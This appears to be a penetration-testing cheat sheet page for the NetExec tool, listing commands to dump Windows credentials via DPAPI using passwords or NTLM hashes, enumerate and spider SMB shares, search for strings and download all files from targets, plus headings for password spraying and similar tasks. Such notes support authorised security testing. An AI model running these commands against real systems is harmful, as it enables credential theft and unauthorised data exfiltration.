NetExec

URL to tool: https://github.com/Pennyw0rth/NetExec

Dump credentials

# DPAPI with a password (add --local-auth if needed)
nxc smb '<TARGET-IP>' -u '<USERNAME>' -p '<PASSWORD>' --dpapi

# DPAPI with a hash (add --local-auth if needed)
nxc smb '<TARGET-IP>' -u '<USERNAME>' -H :'<NTLM-HASH>' --dpapi

SMB shares

# Login with a password
nxc smb hosts.txt -u <username> -p <password> --shares

# Login with a hash
nxc smb hosts.txt -u <username> -H <ntlm>:<ntlm>

# List all readable files
nxc smb <target> -u <username> -p <password> -M spider_plus

# Search for files with certain string
nxc smb <target> -u <username> -p <password> --spider C\$ --pattern <string>

# Dump all files
nxc smb <target> -u <username> -p <password> -M spider_plus -o DOWNLOAD_FLAG=True

Get domain password policy

NULL session and guest logon

Password spray

Enumerate hosts with SMB signing off

Enumerate RDP NLA

Check if RDP login is allowed

Check group memberships

Get user description fields

Change expired password

PreviousActive DirectoryNextResponder

Last updated